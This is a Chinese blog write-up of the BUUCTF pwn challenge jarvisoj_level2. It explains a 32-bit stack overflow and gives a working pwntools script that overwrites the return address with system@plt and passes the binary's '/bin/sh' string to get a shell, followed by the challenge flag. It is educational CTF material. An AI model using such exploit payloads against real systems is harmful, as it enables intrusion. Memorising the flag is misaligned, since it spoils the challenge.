[buuctf]jarvisoj_level2

最新推荐文章于 2024-05-09 22:28:34 发布
最新推荐文章于 2024-05-09 22:28:34 发布
阅读量478 收藏
点赞数
分类专栏: PWN # buuctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125358505
版权
buuctf 同时被 2 个专栏收录
32 篇文章 0 订阅
订阅专栏
PWN
30 篇文章 2 订阅
订阅专栏

[buuctf]jarvisoj_level2

解题

思路

先checksec一下,发现就开了一个NX
在这里插入图片描述
32位的,直接拖入ida中,运行一下,对照看ida。
在这里插入图片描述
之后看见了第一句话。
在这里插入图片描述
之后你输入的全给buf中,大小100h,之后跳回去,输出hello word,大概逻辑知道了,先看看源程序中,有没有/bin/sh这类,在地址0804A024有/bin/sh,之后找plt表,08048320这里调用了system,所以脚本生成。

脚本

from pwn import *
p = remote('node4.buuoj.cn',26844)
#p = process('./level2')
context(os = 'linux',arch = 'i386',log_level = 'debug')
#gdb.attach(p)
payload = b'a'*(0x88+0x04)+p32(0x08048320) +p32(0) +p32(0x0804A024)
p.sendlineafter(b'Input:\n',payload)
p.interactive()

所以最后flag是flag{689cce09-25a9-4c6d-81ed-9939391f057d}

逆向萌新
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CALIPSO_READERS_L2_Level2_5km_calipso_
10-02
nasa CALIPSO Level 2 5 km 数据读取
LRVOSUN.rar_level set_level set model
07-14
A new level set model without initialization, very time effi
jarvisoj_level2题解
OrientalGlass的博客
01-08 216
这题没有现成的system("/bin/sh")可以调用,但是有system函数和/bin/sh字符串。所以可以通过溢出修改返回函数为call system位置,并且将栈顶元素修改为/bin/sh所在地址。这样就可以成功执行system("/bin/sh")2.ida查看,很显然这里有栈溢出。4.寻找system和bin/sh。1.checksec查看。
BUUCTF - PWN】jarvisoj_level2
古月浪子的博客
04-05 644
checksec一下,栈溢出 IDA打开看看,很容易找到溢出点,/bin/sh字符串程序里也有现成的 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) ru=lamb...
jarvisoj_level2[BUUCTF]
最新发布
moonlightsunshin的博客
05-09 154
从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出,IDA会告诉我们buf数组与ebp在栈上的相对位置,即&buf=$ebp-0x88,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且system()的地址可以轻松在plt表中找到,为0x08048320,因此我们只需要在构造一个shell路径的字符转就可以getshell了。
CTF buuoj pwn-----第9题:jarvisoj_level2
bing_Max的博客
09-27 744
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
jarvisoj_level2
m0sway的博客
03-20 875
jarvisoj_level2 WriteUP BUU_PWN
Level_Set.zip_level set_level-set_set
07-15
Level Set 程序 识别图像 很好用的
451687.zip_2 level inverter_model discrete
07-14
Level 2 SV modulation inverter discrete model, matlab6, 5 of simulink,
level_set_image.rar_level set_level set 方程
09-21
图像处理的偏微分方程方法-王大凯第78页的程序
jarvis oj level2–两种方式构造函数栈
超人学飞的日子
04-07 592
关于这个level2,在网上找到了两种解法,放在一起分析了一下。 首先查看题目基本信息: 程序开启了栈不可执行保护。 IDA查看反汇编代码: 可以看到存在栈溢出,并且程序调用了system函数。 所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/b...
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 302
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
[BUUCTF]PWN16——jarvisoj_level2
mcmuyanga的博客
09-01 1889
[BUUCTF]PWN16——jarvisoj_level2 附件 步骤 例行检查,32位,开启了nx保护 试运行一下程序 32位ida载入,shift+f12查看一下程序里的字符串,发现了system函数和 /bin/sh 字符串 双击跟进,ctrl+x本想查看调用该字符串的函数的,没有找到,但是程序里有这些字符串的位置, shell_addr=0x804a024 system_addr=0x8048320 我们可以直接利用这些构造 system(/bin/sh)去执行 跟进试运行时候看到的字
jarvisoj_level2解题
suyuany的博客
02-04 312
payload=b'a'*(0x88+0x4)+p32(sys_addr)+p32(可为任意数值)+p32(binsh)双击点开vulnerable_function()
buuctf PWN jarvisoj_level2
wp568的博客
10-06 127
漏洞,buf数组只给了0x88的大小,但是最多可以读入0x100个字节的数据,所以多读入的数据就会向下把栈给覆盖掉。把function函数的返回地址覆盖成system函数的入口地址,然后把参数改成"bin/sh"字符串的地址0x0804A024。地址为:0x0804845C。地址为:0x0804849E。
jarvisoj-level2
qq_35661990的博客
11-09 1361
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值